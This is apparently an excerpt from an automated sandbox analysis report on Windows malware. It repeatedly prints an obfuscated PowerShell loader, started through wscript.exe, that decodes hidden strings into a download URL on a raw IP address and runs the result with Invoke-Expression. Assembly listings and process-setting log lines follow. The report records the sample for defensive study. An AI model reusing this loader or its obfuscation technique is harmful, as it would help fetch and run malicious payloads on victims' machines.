'Valgets>Bakteri ';$Triangularize=fyrstendmme 'UdfyldniMikalaseUforkorxReprodu ';$Doozie='Medansvaret';$Bombestoppets = fyrstendmme ' ,ulbrieUl,triccUngr.sphForretnoAfrett. Pa.gene%Becifreainex,repRuelsenpCostaladCarabaoaalk,nettPja,tesaFleshbr%tidtag.\ NonmitDSystemko Lnra,mbEkstraibScraggleBudgettlparadeftCraniomrSrsynetuThiokoldClericieSecondin Do torsHamalds1Avgusta4Hildebo0A bejds.hugtandASkoleinfUnreal.fSerpent trillin&Hilsene&B ngtow P.cocureInterfrctubi,olhArtiumsoc onebr .ustulatunmetap ';Illish (fyrstendmme ' Pixm.p$GastroegTypot kl etreado Trachob Pse.doa hrynidl La.dsd:ForsnknDMimicaleAndalusb mirska,osmolat HalefieStandtirDidrach= Nati.n(Genaabnc Derre.mSteerJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens';If (${host}.CurrentCulture) {$Fightet++;}Function fyrstendmme($aldersforskellens){$Breddesekunder=$aldersforskellens.Length-$Fightet;$Energi='SUBsTRI';$Energi+='ng';For( $standsforskellenes=7;$standsforskellenes -lt $Breddesekunder;$standsforskellenes+=8){$Unblessed+=$aldersforskellens.$Energi.Invoke( $standsforskellenes, $Fightet);}$Unblessed;}function Illish($Phagedaena){ . ($Triangularize) ($Phagedaena);}$Opholdsstuernes=fyrstendmme 'Ove,logMP sternoStudentzB,throdiBasommal,ovangslCopywria rbefol/Aphidic5Blokskr.Overvaa0Duarchy Genrefo(Reser,eWDistrusiOsm.regnSpacersdcert,fioPassiarwInterjesPeckedi NydeligNMontr cTAnticle Medinde1 Overcr0elastom.Un.erfo0Renounc; Topot. Bia ricWTrimniniJetsrunnLsdelfl6Hovmodi4forrykk;Nautica stra hsxSne ker6Cohea.t4 theop.; Prster SelvcerEntase v Undres:undecor1Fejlber2Phyllos1Martial.Konkurr0Fdevand)Yawlers AbioloGFemkroneVejrm.lckommandkBemyndio Ti skr/Vaaben.2 Relati0 Fanwr 1Flugtni0Gerning0Analyse1Udmanvr0Sidetal1Lin.les Appo,ehFCyk lbaiSamekhurcalioloeMoa lesfRester o,estselxUdsp ng/ Aandev1 asiali2Tubercl1,eperso. drydde0 Fogf,u ';$Sorteringens=fyrstendmme 'PaakrveU Antedas Sjaelaevulkankr baga e-tjenestA.nderprgMemoryleTelak cn ndtjentDesinfi ';$Bespake=fyrstendmme 'Arthrozh Lat,setLaveslat GenbrupUdnvnel:Donnish/Telefon/Gambesm1Esquire0Aktiesm3Nonrepa. Pushie2Spag um3 Entome7Simonio. digame8 cul ee6 Mistan. Ba oni2Sawneba4porella7Rodesbl/ ClenchF BoatsirOpprioreGraagaamAndenklmBetonk,eSexol glBoghvediAf.rftegAdipsybs calceit GeodifeUlcerog.ElectroxApp,ehesAf,rydsnholden ';$Deutoxide=fyrstendmme 'Valgets>Bakteri ';$Triangularize=fyrstendmme 'UdfyldniMikalaseUforkorxReprodu ';$Doozie='Medansvaret';$Bombestoppets = fyrstendmme ' ,ulbrieUl,triccUngr.sphForretnoAfrett. Pa.gene%Becifreainex,repRuelsenpCostaladCarabaoaalk,nettPja,tesaFleshbr%tidtag.\ NonmitDSystemko Lnra,mbEkstraibScraggleBudgettlparadeftCraniomrSrsynetuThiokoldClericieSecondin Do torsHamalds1Avgusta4Hildebo0A bejds.hugtandASkoleinfUnreal.fSerpent trillin&Hilsene&B ngtow P.cocureInterfrctubi,olhArtiumsoc onebr .ustulatunmetap ';Illish (fyrstendmme ' Pixm.p$GastroegTypot kl etreado Trachob Pse.doa hrynidl La.dsd:ForsnknDMimicaleAndalusb mirska,osmolat HalefieStandtirDidrach= Nati.n(Genaabnc Derre.mSteerJump to behavior
                Suspicious powershell command line found
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens';If (${host}.CurrentCulture) {$Fightet++;}Function fyrstendmme($aldersforskellens){$Breddesekunder=$aldersforskellens.Length-$Fightet;$Energi='SUBsTRI';$Energi+='ng';For( $standsforskellenes=7;$standsforskellenes -lt $Breddesekunder;$standsforskellenes+=8){$Unblessed+=$aldersforskellens.$Energi.Invoke( $standsforskellenes, $Fightet);}$Unblessed;}function Illish($Phagedaena){ . ($Triangularize) ($Phagedaena);}$Opholdsstuernes=fyrstendmme 'Ove,logMP sternoStudentzB,throdiBasommal,ovangslCopywria rbefol/Aphidic5Blokskr.Overvaa0Duarchy Genrefo(Reser,eWDistrusiOsm.regnSpacersdcert,fioPassiarwInterjesPeckedi NydeligNMontr cTAnticle Medinde1 Overcr0elastom.Un.erfo0Renounc; Topot. Bia ricWTrimniniJetsrunnLsdelfl6Hovmodi4forrykk;Nautica stra hsxSne ker6Cohea.t4 theop.; Prster SelvcerEntase v Undres:undecor1Fejlber2Phyllos1Martial.Konkurr0Fdevand)Yawlers AbioloGFemkroneVejrm.lckommandkBemyndio Ti skr/Vaaben.2 Relati0 Fanwr 1Flugtni0Gerning0Analyse1Udmanvr0Sidetal1Lin.les Appo,ehFCyk lbaiSamekhurcalioloeMoa lesfRester o,estselxUdsp ng/ Aandev1 asiali2Tubercl1,eperso. drydde0 Fogf,u ';$Sorteringens=fyrstendmme 'PaakrveU Antedas Sjaelaevulkankr baga e-tjenestA.nderprgMemoryleTelak cn ndtjentDesinfi ';$Bespake=fyrstendmme 'Arthrozh Lat,setLaveslat GenbrupUdnvnel:Donnish/Telefon/Gambesm1Esquire0Aktiesm3Nonrepa. Pushie2Spag um3 Entome7Simonio. digame8 cul ee6 Mistan. Ba oni2Sawneba4porella7Rodesbl/ ClenchF BoatsirOpprioreGraagaamAndenklmBetonk,eSexol glBoghvediAf.rftegAdipsybs calceit GeodifeUlcerog.ElectroxApp,ehesAf,rydsnholden ';$Deutoxide=fyrstendmme 'Valgets>Bakteri ';$Triangularize=fyrstendmme 'UdfyldniMikalaseUforkorxReprodu ';$Doozie='Medansvaret';$Bombestoppets = fyrstendmme ' ,ulbrieUl,triccUngr.sphForretnoAfrett. Pa.gene%Becifreainex,repRuelsenpCostaladCarabaoaalk,nettPja,tesaFleshbr%tidtag.\ NonmitDSystemko Lnra,mbEkstraibScraggleBudgettlparadeftCraniomrSrsynetuThiokoldClericieSecondin Do torsHamalds1Avgusta4Hildebo0A bejds.hugtandASkoleinfUnreal.fSerpent trillin&Hilsene&B ngtow P.cocureInterfrctubi,olhArtiumsoc onebr .ustulatunmetap ';Illish (fyrstendmme ' Pixm.p$GastroegTypot kl etreado Trachob Pse.doa hrynidl La.dsd:ForsnknDMimicaleAndalusb mirska,osmolat HalefieStandtirDidrach= Nati.n(Genaabnc Derre.mSteer
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens';If (${host}.CurrentCulture) {$Fightet++;}Function fyrstendmme($aldersforskellens){$Breddesekunder=$aldersforskellens.Length-$Fightet;$Energi='SUBsTRI';$Energi+='ng';For( $standsforskellenes=7;$standsforskellenes -lt $Breddesekunder;$standsforskellenes+=8){$Unblessed+=$aldersforskellens.$Energi.Invoke( $standsforskellenes, $Fightet);}$Unblessed;}function Illish($Phagedaena){ . ($Triangularize) ($Phagedaena);}$Opholdsstuernes=fyrstendmme 'Ove,logMP sternoStudentzB,throdiBasommal,ovangslCopywria rbefol/Aphidic5Blokskr.Overvaa0Duarchy Genrefo(Reser,eWDistrusiOsm.regnSpacersdcert,fioPassiarwInterjesPeckedi NydeligNMontr cTAnticle Medinde1 Overcr0elastom.Un.erfo0Renounc; Topot. Bia ricWTrimniniJetsrunnLsdelfl6Hovmodi4forrykk;Nautica stra hsxSne ker6Cohea.t4 theop.; Prster SelvcerEntase v Undres:undecor1Fejlber2Phyllos1Martial.Konkurr0Fdevand)Yawlers AbioloGFemkroneVejrm.lckommandkBemyndio Ti skr/Vaaben.2 Relati0 Fanwr 1Flugtni0Gerning0Analyse1Udmanvr0Sidetal1Lin.les Appo,ehFCyk lbaiSamekhurcalioloeMoa lesfRester o,estselxUdsp ng/ Aandev1 asiali2Tubercl1,eperso. drydde0 Fogf,u ';$Sorteringens=fyrstendmme 'PaakrveU Antedas Sjaelaevulkankr baga e-tjenestA.nderprgMemoryleTelak cn ndtjentDesinfi ';$Bespake=fyrstendmme 'Arthrozh Lat,setLaveslat GenbrupUdnvnel:Donnish/Telefon/Gambesm1Esquire0Aktiesm3Nonrepa. Pushie2Spag um3 Entome7Simonio. digame8 cul ee6 Mistan. Ba oni2Sawneba4porella7Rodesbl/ ClenchF BoatsirOpprioreGraagaamAndenklmBetonk,eSexol glBoghvediAf.rftegAdipsybs calceit GeodifeUlcerog.ElectroxApp,ehesAf,rydsnholden ';$Deutoxide=fyrstendmme 'Valgets>Bakteri ';$Triangularize=fyrstendmme 'UdfyldniMikalaseUforkorxReprodu ';$Doozie='Medansvaret';$Bombestoppets = fyrstendmme ' ,ulbrieUl,triccUngr.sphForretnoAfrett. Pa.gene%Becifreainex,repRuelsenpCostaladCarabaoaalk,nettPja,tesaFleshbr%tidtag.\ NonmitDSystemko Lnra,mbEkstraibScraggleBudgettlparadeftCraniomrSrsynetuThiokoldClericieSecondin Do torsHamalds1Avgusta4Hildebo0A bejds.hugtandASkoleinfUnreal.fSerpent trillin&Hilsene&B ngtow P.cocureInterfrctubi,olhArtiumsoc onebr .ustulatunmetap ';Illish (fyrstendmme ' Pixm.p$GastroegTypot kl etreado Trachob Pse.doa hrynidl La.dsd:ForsnknDMimicaleAndalusb mirska,osmolat HalefieStandtirDidrach= Nati.n(Genaabnc Derre.mSteer
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens';If (${host}.CurrentCulture) {$Fightet++;}Function fyrstendmme($aldersforskellens){$Breddesekunder=$aldersforskellens.Length-$Fightet;$Energi='SUBsTRI';$Energi+='ng';For( $standsforskellenes=7;$standsforskellenes -lt $Breddesekunder;$standsforskellenes+=8){$Unblessed+=$aldersforskellens.$Energi.Invoke( $standsforskellenes, $Fightet);}$Unblessed;}function Illish($Phagedaena){ . ($Triangularize) ($Phagedaena);}$Opholdsstuernes=fyrstendmme 'Ove,logMP sternoStudentzB,throdiBasommal,ovangslCopywria rbefol/Aphidic5Blokskr.Overvaa0Duarchy Genrefo(Reser,eWDistrusiOsm.regnSpacersdcert,fioPassiarwInterjesPeckedi NydeligNMontr cTAnticle Medinde1 Overcr0elastom.Un.erfo0Renounc; Topot. Bia ricWTrimniniJetsrunnLsdelfl6Hovmodi4forrykk;Nautica stra hsxSne ker6Cohea.t4 theop.; Prster SelvcerEntase v Undres:undecor1Fejlber2Phyllos1Martial.Konkurr0Fdevand)Yawlers AbioloGFemkroneVejrm.lckommandkBemyndio Ti skr/Vaaben.2 Relati0 Fanwr 1Flugtni0Gerning0Analyse1Udmanvr0Sidetal1Lin.les Appo,ehFCyk lbaiSamekhurcalioloeMoa lesfRester o,estselxUdsp ng/ Aandev1 asiali2Tubercl1,eperso. drydde0 Fogf,u ';$Sorteringens=fyrstendmme 'PaakrveU Antedas Sjaelaevulkankr baga e-tjenestA.nderprgMemoryleTelak cn ndtjentDesinfi ';$Bespake=fyrstendmme 'Arthrozh Lat,setLaveslat GenbrupUdnvnel:Donnish/Telefon/Gambesm1Esquire0Aktiesm3Nonrepa. Pushie2Spag um3 Entome7Simonio. digame8 cul ee6 Mistan. Ba oni2Sawneba4porella7Rodesbl/ ClenchF BoatsirOpprioreGraagaamAndenklmBetonk,eSexol glBoghvediAf.rftegAdipsybs calceit GeodifeUlcerog.ElectroxApp,ehesAf,rydsnholden ';$Deutoxide=fyrstendmme 'Valgets>Bakteri ';$Triangularize=fyrstendmme 'UdfyldniMikalaseUforkorxReprodu ';$Doozie='Medansvaret';$Bombestoppets = fyrstendmme ' ,ulbrieUl,triccUngr.sphForretnoAfrett. Pa.gene%Becifreainex,repRuelsenpCostaladCarabaoaalk,nettPja,tesaFleshbr%tidtag.\ NonmitDSystemko Lnra,mbEkstraibScraggleBudgettlparadeftCraniomrSrsynetuThiokoldClericieSecondin Do torsHamalds1Avgusta4Hildebo0A bejds.hugtandASkoleinfUnreal.fSerpent trillin&Hilsene&B ngtow P.cocureInterfrctubi,olhArtiumsoc onebr .ustulatunmetap ';Illish (fyrstendmme ' Pixm.p$GastroegTypot kl etreado Trachob Pse.doa hrynidl La.dsd:ForsnknDMimicaleAndalusb mirska,osmolat HalefieStandtirDidrach= Nati.n(Genaabnc Derre.mSteerJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens';If (${host}.CurrentCulture) {$Fightet++;}Function fyrstendmme($aldersforskellens){$Breddesekunder=$aldersforskellens.Length-$Fightet;$Energi='SUBsTRI';$Energi+='ng';For( $standsforskellenes=7;$standsforskellenes -lt $Breddesekunder;$standsforskellenes+=8){$Unblessed+=$aldersforskellens.$Energi.Invoke( $standsforskellenes, $Fightet);}$Unblessed;}function Illish($Phagedaena){ . ($Triangularize) ($Phagedaena);}$Opholdsstuernes=fyrstendmme 'Ove,logMP sternoStudentzB,throdiBasommal,ovangslCopywria rbefol/Aphidic5Blokskr.Overvaa0Duarchy Genrefo(Reser,eWDistrusiOsm.regnSpacersdcert,fioPassiarwInterjesPeckedi NydeligNMontr cTAnticle Medinde1 Overcr0elastom.Un.erfo0Renounc; Topot. Bia ricWTrimniniJetsrunnLsdelfl6Hovmodi4forrykk;Nautica stra hsxSne ker6Cohea.t4 theop.; Prster SelvcerEntase v Undres:undecor1Fejlber2Phyllos1Martial.Konkurr0Fdevand)Yawlers AbioloGFemkroneVejrm.lckommandkBemyndio Ti skr/Vaaben.2 Relati0 Fanwr 1Flugtni0Gerning0Analyse1Udmanvr0Sidetal1Lin.les Appo,ehFCyk lbaiSamekhurcalioloeMoa lesfRester o,estselxUdsp ng/ Aandev1 asiali2Tubercl1,eperso. drydde0 Fogf,u ';$Sorteringens=fyrstendmme 'PaakrveU Antedas Sjaelaevulkankr baga e-tjenestA.nderprgMemoryleTelak cn ndtjentDesinfi ';$Bespake=fyrstendmme 'Arthrozh Lat,setLaveslat GenbrupUdnvnel:Donnish/Telefon/Gambesm1Esquire0Aktiesm3Nonrepa. Pushie2Spag um3 Entome7Simonio. digame8 cul ee6 Mistan. Ba oni2Sawneba4porella7Rodesbl/ ClenchF BoatsirOpprioreGraagaamAndenklmBetonk,eSexol glBoghvediAf.rftegAdipsybs calceit GeodifeUlcerog.ElectroxApp,ehesAf,rydsnholden ';$Deutoxide=fyrstendmme 'Valgets>Bakteri ';$Triangularize=fyrstendmme 'UdfyldniMikalaseUforkorxReprodu ';$Doozie='Medansvaret';$Bombestoppets = fyrstendmme ' ,ulbrieUl,triccUngr.sphForretnoAfrett. Pa.gene%Becifreainex,repRuelsenpCostaladCarabaoaalk,nettPja,tesaFleshbr%tidtag.\ NonmitDSystemko Lnra,mbEkstraibScraggleBudgettlparadeftCraniomrSrsynetuThiokoldClericieSecondin Do torsHamalds1Avgusta4Hildebo0A bejds.hugtandASkoleinfUnreal.fSerpent trillin&Hilsene&B ngtow P.cocureInterfrctubi,olhArtiumsoc onebr .ustulatunmetap ';Illish (fyrstendmme ' Pixm.p$GastroegTypot kl etreado Trachob Pse.doa hrynidl La.dsd:ForsnknDMimicaleAndalusb mirska,osmolat HalefieStandtirDidrach= Nati.n(Genaabnc Derre.mSteerJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,14_2_004044A4
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD346F0943 push E95AFFD0h; ret 2_2_00007FFD346F09C9
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD346F09F3 push E95AFFD0h; ret 2_2_00007FFD346F09C9
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD347C54AD push ebp; iretd 2_2_00007FFD347C5538
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04EAEC78 pushfd ; retf 5_2_04EAEC79
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07BE21A8 push eax; mov dword ptr [esp], ecx5_2_07BE21B4
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07BE1FC8 push eax; mov dword ptr [esp], ecx5_2_07BE21B4
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_097D6D41 push 00000012h; iretd 5_2_097D6D4F
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_097DCBD5 push eax; iretd 5_2_097DCBDA
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21362806 push ecx; ret 10_2_21362819
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21371219 push esp; iretd 10_2_2137121A
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_03A7CBD5 push eax; iretd 10_2_03A7CBDA
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_03A76D41 push 00000012h; iretd 10_2_03A76D4F
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0044693D push ecx; ret 14_2_0044694D
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0044DB70 push eax; ret 14_2_0044DB84
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0044DB70 push eax; ret 14_2_0044DBAC
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00451D54 push eax; ret 14_2_00451D61
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_0044B090 push eax; ret 15_2_0044B0A4
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_0044B090 push eax; ret 15_2_0044B0CC
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_00451D34 push eax; ret 15_2_00451D41
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_00444E71 push ecx; ret 15_2_00444E81
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00414060 push eax; ret 16_2_00414074
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00414060 push eax; ret 16_2_0041409C
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00414039 push ecx; ret 16_2_00414049
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_004164EB push 0000006Ah; retf 16_2_004165C4
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00416553 push 0000006Ah; retf 16_2_004165C4
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00416555 push 0000006Ah; retf 16_2_004165C4
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,15_2_004047CB
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
